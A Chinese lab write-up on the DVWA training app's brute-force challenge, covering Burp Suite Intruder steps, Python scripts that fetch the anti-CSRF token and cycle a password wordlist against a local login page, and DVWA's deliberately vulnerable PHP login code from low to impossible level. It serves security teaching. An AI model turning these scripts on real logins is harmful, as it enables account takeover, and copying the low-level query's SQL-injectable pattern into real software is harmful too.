当前位置:   article > 正文

dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析)_brute force下载

brute force下载

建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用

owaspbwa下载地址: OWASP Broken Web Applications Project download | SourceForge.net

注:owaspbwa的本机用户名root密码owaspbwa,记得看看靶机的ip方便以后使用。dvwa的用户名和密码都为admin(owaspbwa中的dvwa是此,其他的用户名为admin密码为password)

暴力破解原理

利用抓包软件抓包,来不断对单个用户名穷举密码的操作

注:密码本和用户名本里面应当有所谓的用户名和密码

Brute Force(Security Level: low)

漏洞利用

打开burp对此网站抓包,用户和密码就是随便输入,只是为了抓包

将此数据包发送到intruder模块

这里会有几个标出来的字段,直接选择clear,选中需要爆破是username和password的值利用add添加(也可以直接爆破密码)(前提是要知道用户名建议直接admin)

选中paysloads模块,进行设置,直接在payload options选择load去添加字典,或者用add添加单个字段

点击右上角的start attack就行,等待一下就可以

通过status和length筛选可以看到密码

代码分析

  1. <?php
  2. if( isset( $_GET[ 'Login' ] ) ) {
  3. // Get username
  4. $user = $_GET[ 'username' ];
  5. // Get password
  6. $pass = $_GET[ 'password' ];
  7. $pass = md5( $pass );
  8. // Check the database
  9. $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
  10. $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  11. if( $result && mysqli_num_rows( $result ) == 1 ) {
  12. // Get users details
  13. $row = mysqli_fetch_assoc( $result );
  14. $avatar = $row["avatar"];
  15. // Login successful
  16. echo "<p>Welcome to the password protected area {$user}</p>";
  17. echo "<img src=\"{$avatar}\" />";
  18. }
  19. else {
  20. // Login failed
  21. echo "<pre><br />Username and/or password incorrect.</pre>";
  22. }
  23. ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  24. }
  25. ?>

就是一个只实现了登入的代码,只是对密码进行md5加密,防止我们通过密码进行SQL注入(可以使用username进行SQL注入),可没有对帐号的登入尝试次数做限制。

Brute Force(Security Level: medium)

漏洞利用

与上一难度一样,但是需要设置时停

修改burp的resource pool模块(本模块是修改攻击速度)

按此配置就行,可以试试能不能更快爆破,只要大于网站要求请求时间就可

结果与上面一样(爆破会很慢的,就不放出来了)

代码分析

  1. <?php
  2. if( isset( $_GET[ 'Login' ] ) ) {
  3. // Sanitise username input
  4. $user = $_GET[ 'username' ];
  5. $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  6. // Sanitise password input
  7. $pass = $_GET[ 'password' ];
  8. $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  9. $pass = md5( $pass );
  10. // Check the database
  11. $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
  12. $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  13. if( $result && mysqli_num_rows( $result ) == 1 ) {
  14. // Get users details
  15. $row = mysqli_fetch_assoc( $result );
  16. $avatar = $row["avatar"];
  17. // Login successful
  18. echo "<p>Welcome to the password protected area {$user}</p>";
  19. echo "<img src=\"{$avatar}\" />";
  20. }
  21. else {
  22. // Login failed
  23. sleep( 2 );
  24. echo "<pre><br />Username and/or password incorrect.</pre>";
  25. }
  26. ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  27. }
  28. ?>

这边的代码加上了一个,延迟两秒才能下一个,所以延长了爆破时间,怎加的是时间成本。

mysqli_real_escape_string(string,connection) :函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义,基本可以抵抗SQL注入

Brute Force(Security Level: high)

漏洞利用

建议看看token是否正常,建议用Linux

burp抓包

前面一样,修改options下的grep-extract和

找到token

先修改值,在单击refetch response

将payloads下的payload set 改为2

就可以攻击了

python脚本

python2.x脚本

  1. from bs4 import BeautifulSoup
  2. import urllib2
  3. header={'Host':'127.0.0.1',
  4. 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
  5. 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  6. 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
  7. 'Referer':'http://127.0.0.1/vulnerabilities/brute/',
  8. 'cookie':'PHPSESSID=6oqhn9tsrs80rbf3h4cvjutnn6; security=high',
  9. 'Connection':'close',
  10. 'Upgrade-Insecure-Requests':'1'
  11. }
  12. requrl="http://127.0.0.1/vulnerabilities/brute/"
  13. def get_token(requrl,header):
  14. req=urllib2.Request(url=requrl,headers=header)
  15. response=urllib2.urlopen(req)
  16. print response.getcode(),
  17. the_page=response.read()
  18. print len(the_page)
  19. soup=BeautifulSoup(the_page,"html.parser") #将返回的html页面解析为一个BeautifulSoup对象
  20. input=soup.form.select("input[type='hidden']") #返回的是一个list列表
  21. user_token=input[0]['value'] #获取用户的token
  22. return user_token
  23. user_token=get_token(requrl,header)
  24. i=0
  25. for line in open("E:\Password\mima.txt"):
  26. requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
  27. i=i+1
  28. print i , 'admin' ,line.strip(),
  29. user_token=get_token(requrl,header)
  30. if(i==20):
  31. break

python3.x

  1. from bs4 import BeautifulSoup
  2. import requests
  3. header={'Host':'127.0.0.1',
  4. 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
  5. 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  6. 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
  7. 'Referer':'http://127.0.0.1/vulnerabilities/brute/',
  8. 'cookie':'PHPSESSID=8p4kb7jc1df431lo6qe249quv2; security=high',
  9. 'Connection':'close',
  10. 'Upgrade-Insecure-Requests':'1'
  11. }
  12. requrl="http://127.0.0.1/vulnerabilities/brute/"
  13. def get_token(requrl,header):
  14. response=requests.get(url=requrl,headers=header)
  15. print (response.status_code,len(response.content))
  16. soup=BeautifulSoup(response.text,"html.parser")
  17. input=soup.form.select("input[type='hidden']") #返回的是一个list列表
  18. user_token=input[0]['value'] #获取用户的token
  19. return user_token
  20. user_token=get_token(requrl,header)
  21. i=0
  22. for line in open("E:\Password\mima.txt"):
  23. requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
  24. i=i+1
  25. print (i , 'admin' ,line.strip(),end=" ")
  26. user_token=get_token(requrl,header)
  27. if(i==20):
  28. break

这个是参考的(2条消息) DVWA之Brute Force(暴力破解)_谢公子的博客-CSDN博客_dvwa brute force

这个自己跑下吧

代码分析

  1. <?php
  2. if( isset( $_GET[ 'Login' ] ) ) {
  3. // Check Anti-CSRF token
  4. checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
  5. // Sanitise username input
  6. $user = $_GET[ 'username' ];
  7. $user = stripslashes( $user );
  8. $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  9. // Sanitise password input
  10. $pass = $_GET[ 'password' ];
  11. $pass = stripslashes( $pass );
  12. $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  13. $pass = md5( $pass );
  14. // Check database
  15. $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
  16. $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  17. if( $result && mysqli_num_rows( $result ) == 1 ) {
  18. // Get users details
  19. $row = mysqli_fetch_assoc( $result );
  20. $avatar = $row["avatar"];
  21. // Login successful
  22. echo "<p>Welcome to the password protected area {$user}</p>";
  23. echo "<img src=\"{$avatar}\" />";
  24. }
  25. else {
  26. // Login failed
  27. sleep( rand( 0, 3 ) );
  28. echo "<pre><br />Username and/or password incorrect.</pre>";
  29. }
  30. ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  31. }
  32. // Generate Anti-CSRF token
  33. generateSessionToken();
  34. ?>

前面的防护基础上加上了Anti-CSRF token来抵御CSRF的攻击,使用了stripslashes函数和mysqli_real_esacpe_string来抵御SQL注入和XSS的攻击。由于使用了Anti-CSRF token,每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。

Brute Force(Security Level: impossible)

代码分析

  1. <?php
  2. if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
  3. // Check Anti-CSRF token
  4. checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
  5. // Sanitise username input
  6. $user = $_POST[ 'username' ];
  7. $user = stripslashes( $user );
  8. $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  9. // Sanitise password input
  10. $pass = $_POST[ 'password' ];
  11. $pass = stripslashes( $pass );
  12. $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  13. $pass = md5( $pass );
  14. // Default values
  15. $total_failed_login = 3;
  16. $lockout_time = 15;
  17. $account_locked = false;
  18. // Check the database (Check user information)
  19. $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
  20. $data->bindParam( ':user', $user, PDO::PARAM_STR );
  21. $data->execute();
  22. $row = $data->fetch();
  23. // Check to see if the user has been locked out.
  24. if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
  25. // User locked out. Note, using this method would allow for user enumeration!
  26. //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";
  27. // Calculate when the user would be allowed to login again
  28. $last_login = strtotime( $row[ 'last_login' ] );
  29. $timeout = $last_login + ($lockout_time * 60);
  30. $timenow = time();
  31. /*
  32. print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
  33. print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
  34. print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
  35. */
  36. // Check to see if enough time has passed, if it hasn't locked the account
  37. if( $timenow < $timeout ) {
  38. $account_locked = true;
  39. // print "The account is locked<br />";
  40. }
  41. }
  42. // Check the database (if username matches the password)
  43. $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
  44. $data->bindParam( ':user', $user, PDO::PARAM_STR);
  45. $data->bindParam( ':password', $pass, PDO::PARAM_STR );
  46. $data->execute();
  47. $row = $data->fetch();
  48. // If its a valid login...
  49. if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
  50. // Get users details
  51. $avatar = $row[ 'avatar' ];
  52. $failed_login = $row[ 'failed_login' ];
  53. $last_login = $row[ 'last_login' ];
  54. // Login successful
  55. echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
  56. echo "<img src=\"{$avatar}\" />";
  57. // Had the account been locked out since last login?
  58. if( $failed_login >= $total_failed_login ) {
  59. echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
  60. echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
  61. }
  62. // Reset bad login count
  63. $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
  64. $data->bindParam( ':user', $user, PDO::PARAM_STR );
  65. $data->execute();
  66. } else {
  67. // Login failed
  68. sleep( rand( 2, 4 ) );
  69. // Give the user some feedback
  70. echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
  71. // Update bad login count
  72. $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
  73. $data->bindParam( ':user', $user, PDO::PARAM_STR );
  74. $data->execute();
  75. }
  76. // Set the last login time
  77. $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
  78. $data->bindParam( ':user', $user, PDO::PARAM_STR );
  79. $data->execute();
  80. }
  81. // Generate Anti-CSRF token
  82. generateSessionToken();
  83. ?>

在上一难度的基础上对用户的操作做了限制,当登入失败3此后,账号会锁住15s,同时采用了更为安全的PDO(PHP Data Object)机制防御sql注入,这里因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/726512
推荐阅读
相关标签
  

闽ICP备14008679号